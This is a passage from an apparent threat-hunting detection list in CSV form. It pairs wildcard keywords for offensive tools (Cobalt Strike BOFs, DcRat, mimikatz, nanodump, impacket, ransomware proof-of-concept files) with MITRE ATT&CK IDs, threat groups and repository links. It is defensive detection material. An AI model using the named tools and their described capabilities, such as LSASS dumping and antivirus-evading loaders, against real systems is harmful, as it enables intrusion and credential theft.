- T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/netero1010/Quser-BOF,1,1,N/A,10,10,78,10,2023-03-22T17:07:02Z,2021-04-01T15:19:50Z -*quser.x86.o*,offensive_tool_keyword,cobaltstrike,Cobalt Strike BOF for quser.exe 
implementation using Windows API,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/netero1010/Quser-BOF,1,1,N/A,10,10,78,10,2023-03-22T17:07:02Z,2021-04-01T15:19:50Z -*qwinsta /server:*,greyware_tool_keyword,qwinsta,enumerate rdp session on a remote server,T1049 - T1018 - T1021.001,TA0007 - TA0009 - TA0010,N/A,N/A,Discovery,N/A,1,0,N/A,3,8,N/A,N/A,N/A,N/A -*qwqdanchun*,offensive_tool_keyword,DcRat,DcRat C2 A simple remote tool in C#,T1071 - T1021 - T1003,TA0011,N/A,N/A,C2,https://github.com/qwqdanchun/DcRat,1,1,N/A,10,10,817,352,2022-02-07T05:37:09Z,2021-03-12T11:00:37Z -*qwqdanchun/DcRat*,offensive_tool_keyword,DcRat,DcRat C2 A simple remote tool in C#,T1071 - T1021 - T1003,TA0011,N/A,N/A,C2,https://github.com/qwqdanchun/DcRat,1,1,N/A,10,10,817,352,2022-02-07T05:37:09Z,2021-03-12T11:00:37Z -*QWRkLU1lbWJlciBOb3RlUHJvcGVydHkgLU5hbWUgVmlydHVhbFByb3RlY3QgLVZhbHVlICRWaXJ0dWFsUHJvdGVjdA*,offensive_tool_keyword,mimikatz,invoke mimiaktz string found used by the tool EDRaser ,T1070.004 - T1027 - T1564.001,TA0005 - TA0040 - TA0003,N/A,N/A,Defense 
Evasion,https://github.com/SafeBreach-Labs/EDRaser,1,1,N/A,10,2,118,16,2023-09-27T13:45:05Z,2023-08-10T04:30:45Z -*QXh4OEF4eDhBeHg4QXh4OA==*,offensive_tool_keyword,cobaltstrike,ShellCode_Loader - Msf&CobaltStrike Antivirus ShellCode loader. Shellcode_encryption - Antivirus Shellcode encryption generation tool. currently tested for Antivirus 360 & Huorong & Computer Manager & Windows Defender (other antivirus software not tested).,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Axx8/ShellCode_Loader,1,1,N/A,10,10,389,49,2022-09-20T07:24:25Z,2022-09-02T14:41:18Z -*r00t-3xp10it*,offensive_tool_keyword,Github Username,Pentest hosting multiple offensive tools,N/A,N/A,N/A,N/A,Exploitation tools,https://github.com/r00t-3xp10it,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*r0oth3x49/Tor.git*,offensive_tool_keyword,Tor,Tor is a python based module for using tor proxy/network services on windows - osx - linux with just one click.,T1090 - T1134 - T1188 - T1307 - T1497 - T1560,TA0001 - TA0002 - TA0005 - TA0011,N/A,N/A,Defense Evasion - Data 
Exfiltration,https://github.com/r0oth3x49/Tor,1,1,N/A,N/A,2,148,44,2018-04-21T10:55:00Z,2016-09-22T11:22:33Z -*r1cksec/thoth*,offensive_tool_keyword,thoth,Automate recon for red team assessments.,T1190 - T1083 - T1018,TA0007 - TA0043 - TA0001,N/A,N/A,Reconnaissance,https://github.com/r1cksec/thoth,1,1,N/A,7,1,75,8,2023-09-27T06:46:46Z,2021-11-15T13:40:56Z -*r2pm -i dirtycow*,offensive_tool_keyword,POC,POC exploitation for dirtycow vulnerability,T1543,TA0003 - TA0004,N/A,N/A,Exploitation tools,https://github.com/nowsecure/dirtycow,1,0,N/A,N/A,1,93,30,2019-05-13T13:17:31Z,2016-10-22T14:00:37Z -*r4wd3r/Suborner*,offensive_tool_keyword,Suborner,The Invisible Account Forger - A simple program to create a Windows account you will only know about ,T1098 - T1175 - T1033,TA0007 - TA0008 - TA0003,N/A,N/A,Persistence,https://github.com/r4wd3r/Suborner,1,1,N/A,N/A,5,452,58,2022-09-02T09:04:46Z,2022-04-26T00:12:58Z -*Radare2*,offensive_tool_keyword,Radare2,r2 is a rewrite from scratch of radare in order to provide a set of libraries and tools to work with binary files.Radare project started as a forensics tool. a scriptable command-line hexadecimal editor able to open disk files. but later added support for analyzing binaries. disassembling code. debugging programs. 
attaching to remote gdb servers,T1057 - T1064 - T1059 - T1202,TA0002 - TA0008 - TA0001,N/A,N/A,Information Gathering,https://github.com/radareorg/radare2,1,0,N/A,N/A,10,18644,2911,2023-10-03T21:41:38Z,2012-07-03T07:42:26Z -*radius2john.pl*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*radius2john.py*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*RAI/ase_docker*,offensive_tool_keyword,cobaltstrike,Rapid Attack Infrastructure (RAI),T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/obscuritylabs/RAI,1,1,N/A,10,10,283,53,2021-10-06T17:44:19Z,2018-02-12T16:23:23Z -*rai-attack-servers.*,offensive_tool_keyword,cobaltstrike,Rapid Attack Infrastructure (RAI),T1548.002 
- T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/obscuritylabs/RAI,1,1,N/A,10,10,283,53,2021-10-06T17:44:19Z,2018-02-12T16:23:23Z -*RainbowCrack*,offensive_tool_keyword,RainbowCrack,The RainbowCrack tool is a hash cracker that makes use of a large-scale time-memory trade-off. A traditional brute force cracker tries all possible plaintexts one by one. which can be time consuming for complex passwords. RainbowCrack uses a time-memory trade-off to do all the cracking-time computation in advance and store the results in so-called rainbow tables. It does take a long time to precompute the tables but RainbowCrack can be hundreds of times faster than a brute force cracker once the precomputation is finished. For downloads and more information. 
visit the RainbowCrack homepage,T1110 - T1208 - T1212 - T1609,TA0001 - TA0002 - TA0003 - TA0005 - TA0007 - TA0011,N/A,N/A,Credential Access,http://project-rainbowcrack.com/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*rai-redirector-dns*,offensive_tool_keyword,cobaltstrike,Rapid Attack Infrastructure (RAI),T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/obscuritylabs/RAI,1,1,N/A,10,10,283,53,2021-10-06T17:44:19Z,2018-02-12T16:23:23Z -*rai-redirector-http*,offensive_tool_keyword,cobaltstrike,Rapid Attack Infrastructure (RAI),T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - 
T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/obscuritylabs/RAI,1,1,N/A,10,10,283,53,2021-10-06T17:44:19Z,2018-02-12T16:23:23Z -*raiseChild.py*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/SecureAuthCorp/impacket,1,0,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*rajkumardusad/onex*,offensive_tool_keyword,onex,Onex is a package manager for hacker's. Onex manage more than 400+ hacking tools that can be installed on single click,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/rajkumardusad/onex,1,1,N/A,N/A,,N/A,,, -*rajkumardusad/Tool-X*,offensive_tool_keyword,Tool-X,Tool-X is a Kali Linux hacking tools installer for Termux and linux system. Tool-X was developed for Termux and linux based systems. Using Tool-X you can install almost 370+ hacking tools in Termux (android) and other Linux based distributions. 
Now Tool-X is available for Ubuntu Debian etc.,T1212 - T1566 - T1550 - T1133,TA0002 - TA0003 - TA0008,N/A,N/A,Exploitation tools,https://github.com/rajkumardusad/Tool-X,1,1,N/A,N/A,,N/A,,, -*RAMDOMdd28f0dcd9779315ee130deb565dbf315587f1611e54PASSWORD*,offensive_tool_keyword,REC2 ,REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.,T1105 - T1132 - T1071.001,TA0011 - TA0009 - TA0002,N/A,N/A,C2,https://github.com/g0h4n/REC2,1,0,N/A,10,10,100,9,2023-10-01T18:29:27Z,2023-09-25T20:39:59Z -*random_c2_profile*,offensive_tool_keyword,cobaltstrike,Cobalt Strike random C2 Profile generator,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/threatexpress/random_c2_profile,1,1,N/A,10,10,544,83,2023-01-05T21:17:00Z,2021-04-03T20:39:29Z -*random_c2profile.*,offensive_tool_keyword,cobaltstrike,Cobalt Strike random C2 Profile generator,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - 
T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/threatexpress/random_c2_profile,1,1,N/A,10,10,544,83,2023-01-05T21:17:00Z,2021-04-03T20:39:29Z -*random_user_agent.params*,offensive_tool_keyword,cobaltstrike,Cobalt Strike random C2 Profile generator,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - 
menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/threatexpress/random_c2_profile,1,1,N/A,10,10,544,83,2023-01-05T21:17:00Z,2021-04-03T20:39:29Z -*random_user_agent.user_agent*,offensive_tool_keyword,cobaltstrike,Cobalt Strike random C2 Profile generator,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/threatexpress/random_c2_profile,1,1,N/A,10,10,544,83,2023-01-05T21:17:00Z,2021-04-03T20:39:29Z -*randomalice1986@*,offensive_tool_keyword,dnstwist,See what sort of trouble users can get in trying to type your domain name. Find lookalike domains that adversaries can use to attack you. Can detect typosquatters. phishing attacks. fraud. and brand impersonation. 
Useful as an additional source of targeted threat intelligence.,T1560 - T1565 - T1566 - T1568 - T1569,TA0002 - TA0005,N/A,N/A,Phishing,https://github.com/elceef/dnstwist,1,1,email user name,3,10,4154,709,2023-10-01T22:26:34Z,2015-06-11T12:24:17Z -*-RandomAttackPath -Token*,offensive_tool_keyword,badazure,BadZure orchestrates the setup of Azure Active Directory tenants populating them with diverse entities while also introducing common security misconfigurations to create vulnerable tenants with multiple attack paths,T1583 - T1078.004 - T1095,TA0005 - TA0006 - TA0008,N/A,N/A,Exploitation Tools,https://github.com/mvelazc0/BadZure/,1,0,N/A,5,4,302,18,2023-07-27T15:40:41Z,2023-05-05T04:52:21Z -*randombob1986@*,offensive_tool_keyword,dnstwist,See what sort of trouble users can get in trying to type your domain name. Find lookalike domains that adversaries can use to attack you. Can detect typosquatters. phishing attacks. fraud. and brand impersonation. Useful as an additional source of targeted threat intelligence.,T1560 - T1565 - T1566 - T1568 - T1569,TA0002 - TA0005,N/A,N/A,Phishing,https://github.com/elceef/dnstwist,1,1,email user name,3,10,4154,709,2023-10-01T22:26:34Z,2015-06-11T12:24:17Z -*randomize_sw2_seed.py*,offensive_tool_keyword,nanodump,The swiss army knife of LSASS dumping. 
A flexible tool that creates a minidump of the LSASS process.,T1003.001 - T1003.003,TA0006,N/A,N/A,Credential Access,https://github.com/fortra/nanodump,1,1,N/A,N/A,10,1467,208,2023-09-04T01:25:27Z,2021-11-10T18:28:15Z -*Ransom.Win32.*,signature_keyword,Antivirus Signature,Antiviurs signature_keyword for ransomware,T1486 - T1489 - T1490 - T1485 - T1487 - T1491 - T1492 - T1488 - T1493 - T1497,TA0007 - TA0003 - TA0002 - TA0004 - TA0006 - TA0010,N/A,N/A,Ransomware,https://www.trendmicro.com/content/dam/trendmicro/global/en/research/23/e/blackcat-ransomware-deploys-new-signed-kernel-driver/indicators-blackcat-ransomware-deploys-new-signed-kernel-driver.txt,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*Ransom:Win32*,signature_keyword,Antivirus Signature,AV signature for exploitation tools,N/A,N/A,N/A,N/A,Exploitation tools,N/A,1,0,ransom signatures,10,10,N/A,N/A,N/A,N/A -*Ransom:Win32*,signature_keyword,Antivirus Signature,Antiviurs signature_keyword,N/A,N/A,N/A,N/A,Malware,N/A,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*Ransom:Win64*,signature_keyword,Antivirus Signature,Antiviurs signature_keyword,N/A,N/A,N/A,N/A,Malware,N/A,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*Ransom_Petya*,signature_keyword,Antivirus Signature,Antiviurs signature_keyword,N/A,N/A,N/A,N/A,Ransomware,N/A,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*Ransom_WCRY*,signature_keyword,Antivirus Signature,Antiviurs signature_keyword,N/A,N/A,N/A,N/A,Ransomware,N/A,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*Ransomware POC tool that encrypts a given directory*,offensive_tool_keyword,ContainYourself,Abuses the Windows containers framework to bypass EDRs.,T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015,TA0005,N/A,N/A,Defense Evasion,https://github.com/deepinstinct/ContainYourself,1,0,N/A,10,3,257,31,2023-08-31T07:26:22Z,2023-07-12T14:47:24Z -*Ransomware.dll*,offensive_tool_keyword,DcRat,DcRat C2 A simple remote tool in C#,T1071 - T1021 - 
T1003,TA0011,N/A,N/A,C2,https://github.com/qwqdanchun/DcRat,1,1,N/A,10,10,817,352,2022-02-07T05:37:09Z,2021-03-12T11:00:37Z -*Ransomware.pdb*,offensive_tool_keyword,DcRat,DcRat C2 A simple remote tool in C#,T1071 - T1021 - T1003,TA0011,N/A,N/A,C2,https://github.com/qwqdanchun/DcRat,1,1,N/A,10,10,817,352,2022-02-07T05:37:09Z,2021-03-12T11:00:37Z -*ransomware_config.py*,offensive_tool_keyword,monkey,Infection Monkey - An automated pentest tool,T1587 T1570 T1021 T1072 T1550,N/A,N/A,N/A,Exploitation tools,https://github.com/guardicore/monkey,1,1,N/A,N/A,10,6330,762,2023-10-03T21:06:53Z,2015-08-30T07:22:51Z -*ransomware_payload.py*,offensive_tool_keyword,monkey,Infection Monkey - An automated pentest tool,T1587 T1570 T1021 T1072 T1550,N/A,N/A,N/A,Exploitation tools,https://github.com/guardicore/monkey,1,1,N/A,N/A,10,6330,762,2023-10-03T21:06:53Z,2015-08-30T07:22:51Z -*Ransomware-E20F7CED-42AD-485E-BE4D-DE21DCE58EC0.json*,offensive_tool_keyword,power-pwn,An offensive and defensive security toolset for Microsoft 365 Power Platform,T1078 - T1078.004 - T1136 - T1136.001 - T1021 - T1021.003 - T1114 - T1114.002,TA0003 - TA0004 - TA0005 - TA0001,N/A,N/A,Exploitation tools,https://github.com/mbrg/power-pwn,1,1,N/A,10,4,360,34,2023-09-12T12:44:44Z,2022-06-14T11:40:21Z -*RansomwarePoc.cpp*,offensive_tool_keyword,ContainYourself,Abuses the Windows containers framework to bypass EDRs.,T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015,TA0005,N/A,N/A,Defense Evasion,https://github.com/deepinstinct/ContainYourself,1,1,N/A,10,3,257,31,2023-08-31T07:26:22Z,2023-07-12T14:47:24Z -*RansomwarePoc.exe*,offensive_tool_keyword,ContainYourself,Abuses the Windows containers framework to bypass EDRs.,T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015,TA0005,N/A,N/A,Defense Evasion,https://github.com/deepinstinct/ContainYourself,1,1,N/A,10,3,257,31,2023-08-31T07:26:22Z,2023-07-12T14:47:24Z -*RansomwarePoc\RansomwarePoc*,offensive_tool_keyword,ContainYourself,Abuses the Windows 
containers framework to bypass EDRs.,T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015,TA0005,N/A,N/A,Defense Evasion,https://github.com/deepinstinct/ContainYourself,1,0,N/A,10,3,257,31,2023-08-31T07:26:22Z,2023-07-12T14:47:24Z -*Rapid7*,offensive_tool_keyword,rapid7,Vulnerability scanner,T1046 - T1068 - T1190 - T1201 - T1222 - T1592,TA0001 - TA0002 - TA0007 - TA0011,N/A,N/A,Vulnerability scanner,https://www.rapid7.com/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*rapid7.github.io/metasploit-framework/api/*,offensive_tool_keyword,venom,venom - C2 shellcode generator/compiler/handler,T1027 - T1055 - T1071 - T1505 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/r00t-3xp10it/venom,1,1,N/A,N/A,10,1617,584,2023-10-03T22:06:35Z,2016-11-16T10:40:04Z -*Rar a -v3g -k -r -s -m3 *,offensive_tool_keyword,Earth Lusca Operations Tools,Earth Lusca Operations Tools and commands,T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005,TA0001 - TA0002 - TA0003,cobaltstrike - mimikatz - powersploit - shadowpad - winnti,Earth Lusca,Exploitation tools,https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*rar2john *,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential 
